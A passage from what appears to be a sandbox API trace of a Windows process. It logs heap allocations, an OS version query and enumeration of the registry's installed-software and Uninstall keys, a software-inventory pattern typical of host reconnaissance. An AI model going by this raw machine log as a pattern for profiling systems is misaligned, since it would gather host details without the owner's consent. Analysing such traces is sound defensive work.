hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7f8 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e838 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e758 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e898 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479eda8 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ed48 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eda8 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798c90 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ed48 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479ed00 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c90 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e838 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e7a8 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e8f8 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7a8 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e8c8 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8f8 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e898 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479ed48 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ecb8 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ed48 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798a90 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ecb8 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479eda8 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e7c8 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e778 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.632] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e838 [0146.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e778 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e8d8 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e868 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479ec58 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ec28 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec58 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798a90 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec28 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479ed48 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e7c8 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e838 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e7f8 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e7c8 [0146.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7f8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e8a8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479ebe0 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8a8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479edd8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ebe0 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798a90 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479edd8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479ebe0 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e858 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e7c8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e8a8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e898 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8a8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e7a8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479eb98 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7a8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ebf8 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb98 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798c90 [0146.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ebf8 | out: hHeap=0x4780000) returned 1 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479ec88 [0146.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.635] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.635] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c90 | out: hHeap=0x4780000) returned 1 [0146.635] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.635] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a2e0 [0146.635] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf40c, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.635] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a308 [0146.635] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf40c, cbMultiByte=8, lpWideCharStr=0x479a308, cchWideChar=8 | out: lpWideCharStr=">Build: ") returned 8 [0146.635] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0146.635] GetProcAddress (hModule=0x771d0000, lpProcName="RtlGetVersion") returned 0x7722dbb0 [0146.636] RtlGetVersion (in: lpVersionInformation=0xdf18c | out: lpVersionInformation=0xdf18c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0146.636] GetLastError () returned 0xcb [0146.636] SetLastError (dwErrCode=0xcb) [0146.636] GetLastError () returned 0xcb [0146.636] SetLastError (dwErrCode=0xcb) [0146.636] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf32c, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0146.636] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf32c, cbMultiByte=5, lpWideCharStr=0xdf2a0, cchWideChar=5 | out: lpWideCharStr="10586") returned 5 [0146.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x4797ef0 [0146.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8e) returned 0x479b268 [0146.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0146.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd4) returned 0x479f430 [0146.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0146.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13c) returned 0x47a0880 [0146.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479f430 | out: hHeap=0x4780000) returned 1 [0146.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4791b10 | out: hHeap=0x4780000) returned 1 [0146.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479ed60 [0146.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4792090 [0146.638] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0146.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes\\Installer\\Products", ulOptions=0x0, samDesired=0x20019, phkResult=0xdf1b0 | out: phkResult=0xdf1b0*=0x21c) returned 0x0 [0146.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e758 [0146.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4792090 | out: hHeap=0x4780000) returned 1 [0146.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x4797ef0 [0146.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20219, phkResult=0xdf1b0 | out: phkResult=0xdf1b0*=0x220) returned 0x0 [0146.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e838 [0146.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0146.639] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x0, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a358 [0146.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798b30 [0146.640] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fe40 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b30 | out: hHeap=0x4780000) returned 1 [0146.640] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799e80 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x48) returned 0x4792610 [0146.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.640] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ae8 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x4797ef0 [0146.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4792610 | out: hHeap=0x4780000) returned 1 [0146.640] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x4, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d68 [0146.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x479b268 [0146.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0146.641] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x5, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.641] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x6, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd8) returned 0x479f430 [0146.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0146.641] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x7, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cc8 [0146.641] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x8, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.641] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x9, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478ccf0 [0146.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x138) returned 0x47a11d0 [0146.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479f430 | out: hHeap=0x4780000) returned 1 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xa, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0de0 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xb, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office16.PROPLUS", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xc, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ca0 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xd, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c8) returned 0x47a1310 [0146.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a11d0 | out: hHeap=0x4780000) returned 1 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xe, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791f30 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0xf, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4792090 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x10, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x4797ef0 [0146.642] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x11, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x479b268 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x12, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x479b2e0 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x13, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a11d0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a0) returned 0x47a14e0 [0146.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a1310 | out: hHeap=0x4780000) returned 1 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x14, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x479f430 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x15, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x479f4a8 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x16, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a1248 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x17, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4792038 [0146.643] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x18, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47919b0 [0146.644] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x19, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791ed8 [0146.644] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1a, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791a08 [0146.644] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1b, lpName=0xdedac, lpcchName=0xdeda8, 